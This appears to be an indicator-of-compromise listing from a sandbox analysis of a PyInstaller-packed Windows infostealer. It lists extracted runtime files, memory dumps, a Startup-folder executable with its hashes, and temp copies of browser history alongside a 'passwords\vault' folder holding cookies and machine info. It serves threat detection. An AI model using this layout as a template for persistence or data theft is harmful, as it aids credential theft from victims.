C:\Users\Admin\AppData\Local\Temp\_MEI23842\VCRUNTIME140_1.dll

C:\Users\Admin\AppData\Local\Temp\_MEI23842\select.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI23842\_tkinter.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI23842\_testinternalcapi.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI23842\_testcapi.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI23842\_sqlite3.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI23842\_elementtree.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI23842\_decimal.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI23842\_cffi_backend.cp312-win_amd64.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI23842\_brotli.cp312-win_amd64.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI23842\zlib1.dll

C:\Users\Admin\AppData\Local\Temp\_MEI23842\winsound.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI23842\tk86t.dll

C:\Users\Admin\AppData\Local\Temp\_MEI23842\tcl86t.dll

C:\Users\Admin\AppData\Local\Temp\_MEI23842\sqlite3.dll

memory/1600-1248-0x0000020E118E0000-0x0000020E118E1000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fpu874l6h9r6pypx.exe

MD5 0e8ac8c96394c6a523f41e10788dd32d
SHA1 f5d5e6f86f5f12d25d3813406239341e19e2f4b4
SHA256 d765f74af0a7e3986616b3018fd6190bd389458dcd408f208cb34072ef4eef12
SHA512 8a7ff55f0232fe1fbd4b860f82835cf7e1b7ce9d9bc6dcaad92670e811fa599fbb29b9d902db516d9c512a283168d0f71cfe458cd707d0553748adade954c7d4

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0p3xh5ii.333.ps1

memory/2512-2455-0x00000262D7A90000-0x00000262D7AB2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\downloads_db_n8y4

C:\Users\Admin\AppData\Local\Temp\xs4afeszfpgj.db

C:\Users\Admin\AppData\Local\Temp\7kz4qhj6sm3h.db

C:\Users\Admin\AppData\Local\Temp\history_db_h4w3

C:\Users\Admin\AppData\Roaming\passwords\vault\cookies.txt

C:\Users\Admin\AppData\Roaming\passwords\vault\media\machineinfo.txt
